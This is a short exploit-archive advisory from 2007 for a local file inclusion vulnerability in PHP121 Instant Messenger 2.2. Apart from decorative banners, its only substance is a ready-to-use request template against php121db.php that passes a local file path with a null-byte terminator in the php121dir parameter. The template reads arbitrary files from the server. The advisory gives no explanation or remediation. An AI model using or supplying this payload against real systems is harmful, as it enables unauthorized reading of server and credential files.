id: 1726
date: 04/08/2007
title: PHP121 Instant Messenger 2.2 Local File Inclusion Vulnerability
author: Dj7xpl
cves: 

===============================================================
PHP121 Instant Messenger 2.2 Local File Inclusion Vulnerability
===============================================================



                         +========================I=R=A=N============================+

                                             PHP121 Version 2.2 

                         =========================I=R=A=N=============================

                         +========================I=R=A=N============================+

                         Type :

                         Local File Inclusion Vulnerability 

                         =========================I=R=A=N=============================

                         +========================I=R=A=N============================+

                         Download :

                         http://www.php121.com/download.php

                         =========================I=R=A=N=============================

                         +========================I=R=A=N============================+

                         Bug :

                         http://[Target]/[Path]/php121db.php?php121dir=[ Local File ]%00

                         =========================I=R=A=N=============================



#  0day.today [2023-03-26]  #